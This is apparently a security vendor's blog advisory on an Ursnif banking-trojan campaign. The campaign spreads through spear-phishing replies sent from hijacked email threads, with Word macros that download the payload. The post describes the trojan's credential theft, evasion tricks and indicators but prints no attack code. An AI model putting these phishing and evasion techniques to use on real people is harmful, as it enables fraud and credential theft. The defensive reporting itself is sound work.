A new wave of innovative spear phishing emails has been spotted distributing Ursnif, one of the world's most active and widespread banking trojans.
What makes the spear phishing emails unique: They appear to be using compromised email accounts to reply to active email threads.
Payload delivered via Word docs and macros: The emails include a Word doc attachment with a malicious macro that downloads the Ursnif payload.
What Ursnif does: Ursnif is a multipurpose trojan designed to steal a wide variety of victim information, from banking and credit card credentials via man-in-the-browser attacks to other passwords and private info via keylogging and screenshots.
Getting past many AVs:At the time of this writing, this new variant of Ursnif has a very low detection rate among security products.
Blocking Ursnif:Barkly provides multi-layered protection against these attacks by blocking both the Ursnif payload and the macro that attempts to download it in the first place.
What makes the spear phishing emails in these attacks especially dangerous is that they appear to be utilizing the email accounts of previous victims, in some cases even disguising the messages as replies to existing emails.
Attackers replying to active email chains to spread the infection
In one case, a Barkly user received what appeared to be a response to emails they had been exchanging with contacts at another organization. The new email looked like it was coming from another contact at that organization, who was replying to the previous messages that had been sent.
The new message was noticeably short: "Morning, please see attached and confirm," but in the context of the email chain it was very convincing.
The user opened the attachment — a Word document named "Request.doc" (pictured below) — and followed the instructions it provided to enable macros. Because Ursnif deploys evasive anti-sandbox techniques, it actually waits to launch the macro until the Word document is closed.
Once the document was closed and the macro was launched, Barkly's behavior analysis detected it attempting to execute the following PowerShell code designed to download a malicious payload:
By blocking that attempt from executing, Barkly stopped the attack short of payload delivery and prevented the user's machine from being infected.
By preventing the user from being infected, Barkly also prevented them from being turned into a new delivery vehicle for additional attacks, this time sent from their email account to their email contacts.
Unfortunately, this isn't the first time we've spotted a trojan hijacking victim email accounts to deliver more convincing spear phishing emails. In July, we blocked attacks attempting to spread the Emotet trojan in a simliar way. If this is becoming a larger trend it puts even more emphasis on blocking these attacks at the earliest stage possible, before they have a chance to take hold and turn victims into unknowing attackers.
Ursnif (also known as Gozi) has been an active threat since its discovery in 2007. While, traditionally, its favorite targets have been financial institutions (most recently Japanese banks), it has recently expanded its operations to target a wider variety of organizations as well as a wider variety of credential types.
Most often thought of as a banking trojan, Ursnif now actively seeks out credentials for email accounts, cloud storage accounts, cryptocurrency exchange platforms, and e-commerce sites (in addition to banking and credit card accounts).
Ursnif is capable of stealing information via a variety of techniques, including web injections, man-in-the-browser functionality, keylogging, screenshot grabbing, and more.
In recent years, the trojan has been updated with a variety of advanced features designed to help it evade sandboxesand evenbypass behavioral biometrics defensesby logging and mimicking the speed and cadence at which users type, move their cursors, and submit their information into form fields.
The latest version of Ursnif being delivered in these spear phishing emails also deletes copies of itself once it has been executed, making it more difficult to detect and analyze.
We'll continue to monitor Ursnif closely and watch how it evolves. Sign up to receive updates on this and other new threats in your inbox: Subscribe to the blog.
Word doc: 32695d63215d0bd76887f1373b89607f6b73b193f37f044a518afe3db446bd65